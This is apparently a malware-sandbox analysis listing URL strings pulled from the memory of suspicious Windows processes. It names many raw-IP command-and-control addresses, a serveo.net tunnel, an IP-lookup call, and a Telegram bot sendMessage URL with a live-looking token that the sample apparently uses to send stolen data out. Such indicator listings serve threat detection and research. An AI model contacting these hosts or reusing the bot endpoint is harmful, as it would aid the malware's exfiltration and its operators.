Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.161.20.142:8080
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://116.202.101.219:8080
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:18772/handleOpenWSR?r=http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, hahahahaha.txt.18.dr	String found in binary or memory: http://127.0.0.1:6787/
Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9D5000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:6787/ing=no
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://129.151.109.160:8080
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://144.126.132.141:8080
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://149.88.44.159:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.26.128.6:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://18.228.80.130:80
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59
Source: vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72%
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/get
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD859B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/get/s9VbfeJdTs/hkLYW_user
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/hkLYW_user
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/hkLYW_user%40468325_report.wsr
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:8080/s9VbfeJdTs/hkLYW_user
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.119.118.59:80802
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:8080
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.142.58.127:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://193.142.58.127:80Pk
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.189.109.146:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://212.6.44.53:8080
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://216.250.190.139:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.224.102.6:8001
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.248.176.37:180
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.61.136.13:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.61.136.52:80
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://66.42.56.128:80
Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://82.147.85
Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002DAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://82.147.85.194
Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://82.147.85.194/byte/
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: vkefq4cv.oil.exe, 0000000B.00000002.4115442750.000001B8A9D61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://e2111f95f52ba8be6b2d3394e38b1722.serveo.net:6787//e2111f95f52ba8be6b2d3394e38b1722.serveo.net
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line?fields=query
Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1717594364.000000000785F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/i?
Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01A44000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D17F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: jqOHOuPMJP.exe, 00000000.00000002.1817122140.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997F9F000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A001B2000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B62000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1912000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC01B33000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D18E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.41.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1717242084.0000000007819000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co(=
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD78E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://13.231.21.109:443
Source: vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://164.90.185.9:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://18.178.28.151:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://185.217.98.121:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://192.99.196.191:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://44.228.161.50:443
Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002C.00000002.2953825020.000001EC019D3000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 0000002D.00000002.3553295709.00000167D1783000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://64.227.21.98:443
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000001.00000002.1712328855.0000000005111000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.tele
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=51697
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
